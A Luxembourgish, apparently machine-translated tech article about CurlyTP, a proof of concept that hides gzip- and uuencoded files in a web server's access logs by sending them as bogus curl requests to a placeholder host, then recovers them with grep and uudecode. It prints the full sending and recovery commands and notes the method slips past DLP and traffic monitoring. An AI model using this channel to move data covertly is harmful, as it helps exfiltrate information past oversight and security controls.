Laut der Wikipedia Definitioun ass en Dead Drop e Verschwörungsinstrument dat déngt fir Informatioun oder e puer Elementer tëscht Leit mat enger geheimer Plaz auszetauschen. D'Iddi ass datt d'Leit ni begéinen - awer si tauschen ëmmer nach Informatioun fir d'operativ Sécherheet z'erhalen.

D'Verstoppt soll net opmierksam maachen. Dofir benotze se an der offline Welt dacks diskret Saachen: e lockeren Zille an der Mauer, e Bibliothéiksbuch oder en Huel an engem Bam.

Et gi vill Verschlësselungs- an Anonymiséierungsinstrumenter um Internet, awer de Fakt datt Dir dës Tools benotzt, zitt Opmierksamkeet. Zousätzlech kënne se um Firmen- oder Regierungsniveau blockéiert ginn. Wat kann een maachen?

Entwéckler Ryan Flowers proposéiert eng interessant Optioun - benotzen all Web Server als verstoppt Plaz. Wann Dir driwwer denkt, wat mécht e Webserver? Kritt Ufroen, erausginn Dateien a schreift Logbicher. An et protokolléiert all Ufroen, souguer falsch!

Et stellt sech eraus datt all Webserver erlaabt Iech bal all Message am Logbuch ze späicheren. Blummen gefrot wéi dëst ze benotzen.

Hien bitt dës Optioun:

1. Huelt eng Textdatei (geheime Message) a berechent den Hash (md5sum).
2. Mir codéieren et (gzip+uuencode).
3. Mir schreiwen op de Logbicher mat enger bewosst falsch Ufro un de Server.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Fir e Fichier ze liesen, musst Dir dës Operatiounen an ëmgedréint Uerdnung ausféieren: d'Datei decodéieren an unzipen, kontrolléiert den Hash (den Hash ka sécher iwwer oppe Kanäl iwwerdroe ginn).

Plaze sinn ersat mat =+=sou datt et keng Plazen an der Adress sinn. De Programm, deen den Auteur CurlyTP nennt, benotzt base64 Kodéierung, wéi E-Mail-Uschlëss. D'Ufro gëtt mat engem Schlësselwuert gemaach ?transfer?sou datt den Empfänger et einfach an de Logbicher fanne kann.

Wat gesi mir an de Logbicher an dësem Fall?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Wéi scho gesot, fir e geheime Message ze kréien, musst Dir d'Operatiounen an ëmgedréint Uerdnung ausféieren:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

De Prozess ass einfach ze automatiséieren. Md5sum entsprécht, an den Inhalt vun der Datei bestätegt datt alles richteg dekodéiert gouf.

D'Method ass ganz einfach. "De Punkt vun dëser Übung ass just ze beweisen datt Dateien duerch onschëlleg kleng Webufroen transferéiert kënne ginn, an et funktionnéiert op all Webserver mat Einfache Textprotokoller. Wesentlech ass all Webserver e Verstoppt!” schreift Flowers.

Natierlech funktionnéiert d'Method nëmmen wann den Empfänger Zougang zu Serverprotokoller huet. Awer esou Zougang gëtt zum Beispill vu villen Hosten ugebueden.

Wéi benotzen ech et?

Ryan Flowers seet hien ass keen Informatiounssécherheetsexpert a wäert keng Lëscht vu méigleche Gebrauch fir CurlyTP zesummestellen. Fir hien ass et just e Beweis vum Konzept datt déi vertraute Tools déi mir all Dag gesinn op eng onkonventionell Manéier kënne benotzt ginn.

Tatsächlech huet dës Method eng Rei vu Virdeeler iwwer aner Server "verstoppt" wéi Digital Dead Drop oder PirateBox: et erfuerdert keng speziell Konfiguratioun op der Serversäit oder all spezielle Protokoller - a wäert kee Verdacht bei deenen erwächen, déi de Verkéier iwwerwaachen. Et ass onwahrscheinlech datt e SORM oder DLP System URLe fir kompriméiert Textdateien scannt.

Dëst ass ee vun de Weeër fir Messagen duerch Servicedateien ze vermëttelen. Dir kënnt erënneren wéi e puer fortgeschratt Firmen benotzt Plaz Entwéckler Jobs an HTTP Header oder am Code vun HTML Säiten.

D'Iddi war datt nëmmen Web-Entwéckler dëst Ouschteree gesinn, well eng normal Persoun net d'Header oder den HTML-Code kuckt.

Source: will.com